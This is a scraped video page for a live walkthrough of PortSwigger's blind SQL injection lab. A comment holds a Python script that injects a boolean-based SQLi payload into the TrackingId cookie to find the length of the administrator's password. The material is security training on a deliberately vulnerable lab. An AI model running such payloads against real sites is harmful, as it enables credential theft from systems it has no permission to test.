[LIVE] Blind SQL Injection - PortSwigger Labs

Поделиться
HTML-код
  • Опубликовано: 23 май 2024
  • Welcome to my Web Application Penetration Testing Bible playlist! In this series, I'll demonstrate practical, live testing on PortSwigger Labs, covering SQL Injection, XSS, CSRF, file inclusion vulnerabilities, and more. Perfect for beginners and seasoned pros, join me to enhance your web security skills.
    🔒 Welcome to The Cyber Expert! 🔒
    🌐 Website: thetce.com
    ❤️ Support the channel by donating at: thetce.com/support
    🌟 Join our vibrant community on Discord: / discord
    🔔 Join this channel and unlock exclusive perks:
    / @thecyberexpert
    📺 Visit My Channel For More Exciting Videos:
    / @thecyberexpert
    🌎 Where else can you find me? 🌎
    🔬 GITHUB: www.github.com/Hellsender01
    📷 INSTAGRAM: / harshitjoshi01
    🔗 LINKEDIN: / harshitjoshi01
    🐦 TWITTER: / thecyberexpert_
    📧 EMAIL: hj202001@gmail.com
    🙏 Thank you for watching! 🙏
    🔥 Stay tuned for the latest updates and intriguing content from The Cyber Expert.
    🎵 Music in this video: "The Way" by LiQWYD
    🎧 Free Download / Stream: bit.ly/3HGU9tD
    🎵 Music promoted by Audio Library: • The Way - LiQWYD (No C...
    ✨ Remember to like, share, and subscribe for more engaging cybersecurity adventures. Stay ahead in the cyber world with The Cyber Expert! ✨
    #thecyberexpert
    #harshitjoshi
    #sqli
  • НаукаНаука

Комментарии • 11

  • @TheCyberMaster-i2o
    @TheCyberMaster-i2o Месяц назад

    Very knowledgeable content❤

  • @newuser2474
    @newuser2474 Месяц назад

    Kya yaha par if condition ka bhi use kar sakte hai?

  • @GoaBeach988
    @GoaBeach988 Месяц назад

    Sir make basic python series

    • @kirtanmojidra
      @kirtanmojidra Месяц назад +1

      Chai aur code channel per he bhai😅 best coding teacher

  • @sareer
    @sareer Месяц назад

    # Feelin' lazy? I gotcha!
    # to determine length
    import requests
    import time
    url = 'localhost' # change this
    def get_length():
    for i in range(1, 33):
    cookie = {'TrackingId':'xxxxxxxx', 'session':'xxxxxxxxxx'} # change this
    payload = f"' and length((select password from users where username='administrator'))= {i} --"
    cookie['TrackingId'] = cookie['TrackingId'] + payload
    r = requests.get(url, cookies=cookie, timeout=10) # Set a timeout of 10 seconds
    if 'Welcome back!' in r.text:
    return i
    length = get_length()
    print(f"Password length: {length}")

    • @__pain__05
      @__pain__05 Месяц назад

      Half Code where is the get_data()???

    • @sareer
      @sareer Месяц назад

      @@__pain__05 you are more than lazy

    • @__pain__05
      @__pain__05 Месяц назад

      @@sareer bro i have already Done it 😂
      I was pointing you that u have done it half.

    • @__pain__05
      @__pain__05 Месяц назад

      @@sareer i want to put my code but i know by putting code it will never help people
      Because lazy people will use this code not smart people 🙂

    • @sareer
      @sareer Месяц назад

      @@__pain__05 see my other comment